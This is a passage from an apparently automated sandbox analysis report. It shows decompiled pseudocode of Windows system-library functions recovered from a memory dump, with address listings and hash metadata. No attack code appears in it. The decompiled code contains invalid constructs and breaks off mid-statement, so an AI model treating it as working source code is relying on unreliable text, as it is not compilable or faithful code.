							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x05255142
0x0525514c
0x05255150
0x05255157
0x05255159
0x0525515e
0x05255165
0x05255169
0x0525516c
0x05255172
0x05255176
0x0525517a
0x0525517a
0x0525517a
0x0525517f
0x05296d8b
0x05296d8e
0x05296d91
0x05296d95
0x05296d98
0x05296d9c
0x05296da0
0x05296da3
0x05296da7
0x05296e26
0x05296e26
0x05296e2a
0x052551f9
0x052551f9
0x052551fe
0x05296e33
0x05296e33
0x05296e39
0x05296e3d
0x05296e46
0x05296e50
0x00000000
0x00000000
0x05296e52
0x05296e53
0x05296e56
0x05296e5d
0x00000000
0x00000000
0x00000000
0x05296e5f
0x05296e67
0x05296e77
0x05296e7f
0x05296e80
0x05296e88
0x05296e90
0x05296e9f
0x05296ea5
0x05296ea9
0x05296eb1
0x05296ebf
0x00000000
0x00000000
0x05296ecf
0x05296ed3
0x00000000
0x00000000
0x05296edb
0x05296ede
0x05296ee1
0x05296ee8
0x05296eeb
0x05296eed
0x05296ef0
0x05296ef4
0x05296ef8
0x05296efc
0x00000000
0x00000000
0x05296f0d
0x05296f11
0x05296f32
0x05296f37
0x05296f3b
0x05296f3e
0x05296f41
0x05296f46
0x00000000
0x00000000
0x05296f4c
0x05296f50
0x05296f50
0x05296f54
0x05296f62
0x05296f65
0x05296f6d
0x05296f7b
0x05296f7b
0x05296f93
0x05296f98
0x05296fa0
0x05296fa6
0x05296fb3
0x05296fb6
0x05296fbf
0x05296fc1
0x05296fd5
0x05296fda
0x05296fda
0x05296fdd
0x05296fe2
0x05296fe7
0x05296feb
0x05296fef
0x05296ff3
0x0525520c
0x0525520c
0x0525520f
0x05255215
0x05255234
0x0525523a
0x0525523a
0x05255244
0x05255245
0x05255246
0x05255251
0x05255251
0x05296f13
0x05296f17
0x05296f17
0x05296f18
0x05296f1b
0x05296f1f
0x05296f23
0x00000000
0x05296f28
0x05255204
0x05255204
0x05255208
0x00000000
0x05255208
0x05255185
0x05255188
0x0525518a
0x0525518e
0x05255195
0x05296db1
0x05296db5
0x05296db9
0x0525519b
0x0525519b
0x0525519e
0x052551a7
0x052551a9
0x052551a9
0x052551b5
0x052551b8
0x052551bb
0x052551be
0x052551c1
0x052551c5
0x052551c9
0x052551cd
0x052551cd
0x052551d8
0x052551dc
0x052551e0
0x05296dcc
0x05296dd0
0x05296dd5
0x05296ddd
0x05296de1
0x05296de1
0x05296de5
0x05296deb
0x05296df1
0x05296df7
0x05296dfd
0x05296e01
0x05296e05
0x05296e09
0x05296e0d
0x05296e11
0x05296e11
0x052551eb
0x05296e1a
0x05296e1f
0x05296e21
0x05296e23
0x00000000
0x052551f1
0x052551f1
0x00000000
0x052551f1

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46bd641a44add496c6768c33ff2f06647b4884aa2cc7faa5ff8636077aa143c4
Instruction ID: e33c569627961de1e285ba6ee0c7942707d2e2427f4b9d4b4a8688e56fafbf43
Opcode Fuzzy Hash: 46bd641a44add496c6768c33ff2f06647b4884aa2cc7faa5ff8636077aa143c4
Instruction Fuzzy Hash: 7DC134756183818FD758CF28C580A6AFBF1BF88304F14896EF89A8B352D771E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 052503E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E052503E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x531d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E05250548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0526B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E0523B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x5317c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E05247D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E05247D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E052A7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E05269830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E052A69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x5317c04 != 0) {
						_t118 = _v12;
						_t120 = E052AA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x5317bd8;
						if( *0x5317bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E052695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E052699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E052A3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E0522B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0526AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x5318474 - 3;
										if( *0x5318474 != 3) {
											 *0x53179dc =  *0x53179dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E05247D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E05247D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E052A7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x5318708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x5317b00; // 0x0
							asm("ror esi, cl");
							 *0x531b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E052695D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E05237F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x052503f1
0x052503f7
0x052503f9
0x052503fb
0x052503fd
0x05250400
0x0525040a
0x05294c7a
0x05250537
0x05250547
0x05250410
0x05250410
0x05250414
0x05250417
0x0525041a
0x05250421
0x05250424
0x0525042b
0x0525043b
0x0525043e
0x0525043f
0x0525043f
0x05250446
0x05250449
0x0525044c
0x0525044f
0x05250459
0x05294c8d
0x0525045f
0x0525045f
0x0525045f
0x05250467
0x05294c97
0x05294c9d
0x05294ca4
0x05294caa
0x05294caf
0x05294cb1
0x05294cc3
0x05294cb3
0x05294cbc
0x05294cbc
0x05294cc8
0x05294ccb
0x05294cd7
0x05294cda
0x05294cdf
0x05294cdf
0x05294ccb
0x05294ca4
0x0525046d
0x0525046f
0x0525046f
0x05250471
0x05250476
0x0525047a
0x0525047b
0x05250483
0x05250489
0x0525048d
0x00000000
0x00000000
0x05294ce9
0x05294cef
0x05294d22
0x05294d22
0x00000000
0x05294d22
0x05294cf1
0x05294cf7
0x00000000
0x00000000
0x05294cf9
0x05294cff
0x00000000
0x00000000
0x05294d05
0x05294d07
0x00000000
0x00000000
0x05294d0d
0x05294d0f
0x05294d14
0x05294d16
0x00000000
0x00000000
0x05294d1c
0x05294d1c
0x05250499
0x05250535
0x05250535
0x00000000
0x05250535
0x052504a6
0x05294d2c
0x05294d37
0x05294d39
0x05294d3b
0x00000000
0x00000000
0x05294d41
0x05294d48
0x05250527
0x0525052b
0x0525052d
0x05250530
0x05250530
0x00000000
0x0525052b
0x05294d4e
0x052504ac
0x052504ac
0x052504af
0x052504b2
0x052504b7
0x052504b9
0x052504bb
0x052504bd
0x052504bf
0x052504c5
0x052504c9
0x05294d53
0x05294d59
0x05294db9
0x05294dba
0x05294dbf
0x05294dc2
0x05294dc4
0x05294dc7
0x05294dce
0x00000000
0x05294dce
0x05294d5b
0x05294d61
0x00000000
0x00000000
0x05294d63
0x05294d69
0x00000000
0x00000000
0x05294d6b
0x05294d6e
0x05294d74
0x05294d76
0x05294d7c
0x05294d7e
0x05294d84
0x05294d89
0x05294d8c
0x05294d8d
0x05294d92
0x05294d95
0x05294d96
0x05294d98
0x05294d9a
0x05294d9f
0x05294da4
0x05294da6
0x05294da8
0x05294daf
0x05294db1
0x05294db1
0x05294daf
0x05294da6
0x05294d84
0x05294d7c
0x00000000
0x05294d74
0x052504d6
0x05294de1
0x052504dc
0x052504dc
0x052504dc
0x052504e4
0x05294deb
0x05294df1
0x05294df8
0x05294dfe
0x05294e03
0x05294e05
0x05294e17
0x05294e07
0x05294e10
0x05294e10
0x05294e1c
0x05294e1f
0x05294e35
0x05294e35
0x05294e1f
0x05294df8
0x052504f1
0x052504fa
0x05294e3f
0x05294e47
0x05294e5b
0x05294e61
0x05294e67
0x05294e69
0x05294e71
0x05294e73
0x05250500
0x05250500
0x05250500
0x052504fa
0x05250508
0x0525051d
0x0525051d
0x0525051f
0x05250524
0x00000000
0x05250524
0x05250515
0x05250517
0x05294e7a
0x05294e7c
0x00000000
0x00000000
0x05294e85
0x00000000
0x05294e85
0x00000000
0x05250517

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e72c7a3c207b94a4ed5462e44b428cb7eca95c585ca81c9c73cca07cc87c9f6
Instruction ID: 2e1123cba0f0b8979712e5d0b877994e90ee21ef8c9e0c5f1936f6ccc197e2c6
Opcode Fuzzy Hash: 8e72c7a3c207b94a4ed5462e44b428cb7eca95c585ca81c9c73cca07cc87c9f6
Instruction Fuzzy Hash: EE912231E34215AFDF26AA68CC48BBE7BA5BF01720F090265ED15AB2D0DB749D41C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 0522C600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0522C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x531d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E05236D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0526B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x5317b9c; // 0x0
					_t74 = L05244620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E05269650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L052477F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0526F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E052613C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L052477F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E05269650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0522c608
0x0522c615
0x0522c625
0x0522c62d
0x0522c635
0x0522c640
0x0522c680
0x0522c687
0x0522c688
0x0522c689
0x0522c694
0x0522c694
0x0522c642
0x0522c64a
0x0522c697
0x05297a25
0x05297a2b
0x05297a2e
0x05297a30
0x05297bea
0x05297bea
0x00000000
0x05297bea
0x05297a36
0x05297a43
0x05297a48
0x05297a4c
0x05297a4e
0x00000000
0x00000000
0x05297a58
0x05297a5a
0x05297a5b
0x05297a5c
0x05297a5d
0x05297a63
0x05297a64
0x05297a6a
0x05297a6c
0x05297a6e
0x052979cb
0x052979cb
0x052979ce
0x052979d0
0x05297a98
0x05297a9b
0x05297a9b
0x05297a9e
0x05297aa1
0x05297bbe
0x05297bbe
0x05297bc0
0x05297be0
0x05297be0
0x05297a01
0x05297a01
0x05297a05
0x05297a07
0x05297a15
0x05297a15
0x05297a1a
0x00000000
0x05297a1a
0x05297bc2
0x05297bc6
0x05297bc9
0x05297bcd
0x05297bcf
0x052979e6
0x052979e6
0x052979eb
0x052979eb
0x052979ef
0x052979f1
0x00000000
0x00000000
0x052979f3
0x052979f5
0x052979ff
0x052979ff
0x00000000
0x052979ff
0x052979f7
0x052979fd
0x00000000
0x00000000
0x00000000
0x052979fd
0x05297bd5
0x05297bd8
0x00000000
0x00000000
0x05297ba9
0x05297bac
0x05297bb0
0x05297bb1
0x05297bb1
0x05297bb6
0x00000000
0x05297bb6
0x05297aa7
0x05297aaa
0x00000000
0x00000000
0x05297ab2
0x05297ab3
0x05297ab5
0x05297aec
0x05297aef
0x05297b25
0x05297b28
0x05297b62
0x05297b64
0x05297b8f
0x05297b92
0x05297b96
0x05297b98
0x00000000
0x00000000
0x05297b9e
0x05297b9f
0x05297ba3
0x00000000
0x05297ba3
0x05297b66
0x05297b68
0x05297ae2
0x05297ae2
0x00000000
0x05297ae2
0x05297b6e
0x05297b72
0x05297b75
0x05297b81
0x05297b85
0x05297b87
0x00000000
0x00000000
0x05297b31
0x05297b34
0x05297b3c
0x05297b45
0x05297b46
0x05297b4f
0x05297b51
0x05297b57
0x05297b59
0x05297b59
0x00000000
0x05297b59
0x05297b77
0x00000000
0x05297b77
0x05297b2a
0x00000000
0x05297b2a
0x05297af1
0x05297af3
0x00000000
0x00000000
0x05297afb
0x05297afc
0x05297afe
0x00000000
0x00000000
0x05297b00
0x05297b03
0x00000000
0x00000000
0x05297b05
0x05297b09
0x05297b0d
0x05297b0f
0x00000000
0x00000000
0x05297b18
0x05297b1d
0x00000000
0x05297b1d
0x05297ab7
0x05297ab9
0x00000000
0x00000000
0x05297abf
0x05297ac1
0x00000000
0x00000000
0x05297ac3
0x05297ac6
0x00000000
0x00000000
0x05297ac8
0x05297acc
0x05297ad0
0x05297ad2
0x00000000
0x00000000
0x05297adb
0x00000000
0x05297adb
0x052979d6
0x052979d9
0x052979dc
0x05297a91
0x05297a94
0x00000000
0x05297a94
0x052979e2
0x00000000
0x052979e2
0x05297a74
0x05297a7a
0x00000000
0x00000000
0x05297a8a
0x05297a21
0x05297a21
0x00000000
0x05297a21
0x0522c650
0x0522c651
0x0522c656
0x0522c65c
0x0522c65d
0x0522c663
0x0522c664
0x0522c66a
0x0522c66e
0x052979c5
0x052979c7
0x00000000
0x052979c7
0x0522c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a210af03a05ad27c04f024741083e5b4f73f0337a345074a370a70a189f4bb26
Instruction ID: ea3cb4ceba3d858245e5a9222118fba2f5ed02760cf0798c2e164ac9d33b45fc
Opcode Fuzzy Hash: a210af03a05ad27c04f024741083e5b4f73f0337a345074a370a70a189f4bb26
Instruction Fuzzy Hash: 808182756382029BDF29CE14C890E7AB3A5FF86350F1C495AED4A9B341D730DD45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 052A6DC9, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E052A6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E052A6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E05247D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E05269AE0();
					_t87 = L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E052A795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E052A795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E052A795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E052A795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L05244620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E052A6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E052A6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E052A6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E052A6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
